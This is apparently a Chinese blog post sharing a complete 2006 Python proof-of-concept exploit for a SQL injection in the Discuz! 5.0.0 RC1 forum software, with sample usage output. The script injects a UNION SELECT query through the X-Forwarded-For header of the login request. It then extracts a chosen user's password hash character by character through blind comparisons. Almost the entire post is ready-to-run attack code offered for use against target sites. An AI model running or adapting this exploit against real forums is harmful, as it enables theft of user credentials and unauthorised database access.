Discuz! 5.0.0 RC1 SQL injection PoC

DZ 5.0.0 RC1用的人应该很少,因为是一个过渡版本,之后很快就出了RC2,接着又出了正式版。

Usage: G:\tt\dz.py <url> <uid>
Example: G:\tt\dz.py http://127.0.0.1/dz/

G:\tt>dz.py http://target.com 1
Discuz! 5.0.0 RC1 SQL injection exploit
Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com

[+] Connect target.com
[+] Trying…
[+] Plz wait a long long time…
[+] The uid=1 password hash is:

#!/usr/bin/python
# Discuz! 5.0.0 RC1 SQL injection PoC
# Author: wofeiwo thx superheis help
# Date: Aug 12th 2006

import sys
import httplib
from urlparse import urlparse
from time import sleep

def injection (lenthofpass, realurl, path):
sys.stdout.write('[+] The uid=' + sys.argv[2] + ' password hash is: ')
for num in range(1,lenthofpass+1):
ran = range(97, 123)
for a in range(48, 58): ran.append(a)

for i in ran:

query = '\' union select 122,122,122,122,122,122,122,122 from cdb_members where uid=' + sys.argv[2] + ' AND ascii(substring(CONCAT(password),' + str(num) + ',1))=' + str(i) + ' /*'
header = {'Accept':'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*','Referer':'http://' + realurl[1] + path + 'logging.php?action=login','Accept-Language':'zh-cn','Content-Type':'application/x-www-form-urlencoded','User-Agent':'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; Maxthon)','Connection':'Keep-Alive','Cache-Control':'no-cache','X-Forwarded-For':query,'Cookie':'cdb_sid=70KRjS; cdb_cookietime=2592000'}
data = "formhash=6a49b97f&referer=discuz.php&loginmode=&styleid=&cookietime=2592000&loginfield=username&username=test&password=123456789&questionid=0&answer=&loginsubmit=%E6%8F%90+%C2%A0+%E4%BA%A4"
#print header
#sys.exit(1)
http = httplib.HTTPConnection(realurl[1])
http.request("POST", path + "logging.php?action=login&",data , header)
#sleep(1)
response = http.getresponse()
re1 = response.read()
if re1.find('SELECT') == -1:
print '[-] Unvalnerable host'
print '[-] Exit..'
sys.exit(1);

elif re1.find('ip3') == -1:
sys.stdout.write(chr(i))
http.close()
#sleep(1)
break

#print re1
#print '-----------------------------------------------'
http.close()
#sleep(1)
sys.stdout.write('\n')

def main ():
print 'Discuz! 5.0.0 RC1 SQL injection exploit'
print 'Codz by wofeiwo wofeiwo[0x40]gmail[0x2C]com\n'

if len(sys.argv) == 3:
url = urlparse(sys.argv[1])
if url[2:-1] != '/':
u = url[2] + '/'
else:
u = url[2]
else:
print "Usage: %s <url> <uid>" % sys.argv[0]
print "Example: %s http://127.0.0.1/dz/ 1" % sys.argv[0]
sys.exit(0)

lenth = 32
print '[+] Connect %s' % url[1]
print '[+] Trying...'
print '[+] Plz wait a long long time...'

injection(lenth, url, u)

print '[+] Finished'

if __name__ == '__main__': main()

相关日志

发表评论